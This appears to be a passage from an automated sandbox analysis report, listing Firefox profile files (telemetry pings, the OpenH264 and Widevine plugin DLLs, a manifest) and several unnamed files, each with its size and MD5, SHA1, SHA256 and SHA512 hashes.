MD5e92472ffb52cd6bff14f7f769eec035d
SHA1683c38e563867c4a5730a49ba980f7a2ee28e540
SHA2560c378bd24fd5356c16275758ad416b5d32e00c39d78fb024934f56c600524c60
SHA5127d6231e55a53fa33de551732b7eeba9e030254a6bd52694aaac057a4a98aec5049381fdb999c2129cfb8cd6f7c9f2aa7198b28762f06eef9013829a030bb7945
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\datareporting\glean\pending_pings\db3068e0-8c7c-4b85-bf7d-1f7707f629c9
Filesize26KB
MD5a4985ef1fe5bbc6c6aaa4aaa658b27d7
SHA116ce4f4363edb1d83e7a048e622920c49be38f6c
SHA2564e932c6b5d1bb0fcf5766b8b5ea4a173148ecd17e1aeb6c76d991cb8f146201e
SHA5122b8eb0733f801061e0678d0e88027d43c86daa40d951e20cd7f303c625d518c9bf0f226ec45613543d6006c1bb82d2b495588d2f474724fce911c48597a8c7e4
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\datareporting\glean\pending_pings\eec1854f-9eed-4c67-9889-82c7d26dd49d
Filesize982B
MD558980fd6b33d575471f359ba961d35bb
SHA1f573f9f17efed78c1282a924f23726e680530c5b
SHA2567c51120371aaf57434b0fd7b46a91f054d586f19ac8d37c55e16ab19937bd731
SHA5124ba705b93c3b08b3870520f57f5c89306af50174fb79e52b4ddbc77bb55d290d7b8cca68832283fc10104c2a7b6d6067ba0baeb82803cba2c4faeee1b9d159c5
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
9KB
MD57cf71059162d43167ea85206b4eb2d03
SHA1ca4ecbc12fc809b0b782e43f7c522855f77b3e1a
SHA2569d00c7d55547ad62ac5c1f3d0887eda4a78fc21fe624fad93cbaa824554a6007
SHA51201b0244743b4fa87880ca18838aa671e140115fbd0229b032509602dc69d4702bc0a351cf95c8f5c3a861db85d82e52aaa6c56d13ca6c8cc213b5e1e812b2ee7
-
Filesize
14KB
MD5805fb1021ee539445208fed2d285eea7
SHA14b98f724e621a86063a377d399809a1e6a8bc082
SHA256ae824da904db029fe75a1a962e6045e6f207cd7bb46d7effad9d29155d02c348
SHA512fbfbac566326bda79757c405cf718748db57ab5ac91047b32018286cbc95a4effdd317f04261b098766116b56a9c67b020fc4f49ecebda7d665c3a57a0451adf
-
Filesize
10KB
MD520a89f062be0c052abad05a55894eb22
SHA1a2983a2ec4d4cc12dd204bfdd3f66a215985affc
SHA256842220779c3d406aac9a293ecac6ac109a0f2b730880219fc43369ddc31d47fb
SHA512788ef0d1f9be33202ce8ed7a77bc7f0c31bfda77b30874f241f909bcd352b5fdff57ce6d4eb234a002469599be3e3bd5a0cd430c36488aa527a88760f5698874
-
Filesize
9KB
MD5ed897aa97811ba39a63fa48ebe6023f5
SHA18ce42b83ccc716f03c72f4632257d61c10c323a6
SHA2566020629c67f2fbf3d3ee93b0bdaecb8dcb168b82737b05a598cfeea1b1a93a85
SHA512cf135da05bd89f006bc2c0e1d76736b3faa208610e9d1765e019247eed40d689e4fea707c9d833ce3775e751acb2601fae3d6dd3883c5a62734cbfb18c243d8c
-
Filesize
10KB
MD56a205e04f497c78ea0f207200efbfc39
SHA1520a7c64fa6d3748594fb2f617f98d47dc23a539
SHA2569942c465e6e2ed26c1eada51002814be2b4c1743cfc6b7ec5dfef272f9df1966
SHA512db267677105da120984c88b0482d48b36b4623d647f942a0b205983e40954c8d4fde4f5313313742954c5d75cab79e1115d4c326215d0a4c34d0f48c27f36a47